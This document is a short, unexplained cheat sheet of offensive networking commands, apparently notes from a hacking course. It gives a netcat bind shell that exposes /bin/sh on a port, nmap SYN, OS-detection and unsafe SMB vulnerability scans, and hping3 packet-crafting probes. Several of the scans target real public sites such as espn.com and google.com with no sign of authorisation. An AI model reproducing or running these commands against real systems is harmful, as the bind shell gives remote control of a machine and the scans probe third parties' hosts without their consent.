sparta
nc -l -p(port) -e /bin/sh
nc (Ip) (port)
nmap -sS -O (Ip/24)
man nmap
nmap -sT espn.com
nmap -O espn.com
nmap -sS espn.com
nmap -sS -T2 espn.com

locate *.nse
locate *vuln*.nse
nmap --script <scriptname> <host ip>
nmap --script smb-check-vulns-nse 192.168.1.121
nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p445 192.168.1.121
http-vuln-cve2013-0156.nse
nmap -script-help http-vuln-cve2013-0156.nse

hping3 -h
hping3 -h |more
hping3 -S 192.168.1.105 -p 80
hping -S 192.168.1.105 -p ++1
hping3 -f 192.168.1.105 -p 80
hping3 -f 192.168.1.105 -p 80 -d 10 -E malware
hping3 -z -t 1 -S google.com -p 80
hping3 -Q -S google.com -p 80
hping3 --tcp-timestamp -S google.com -p 80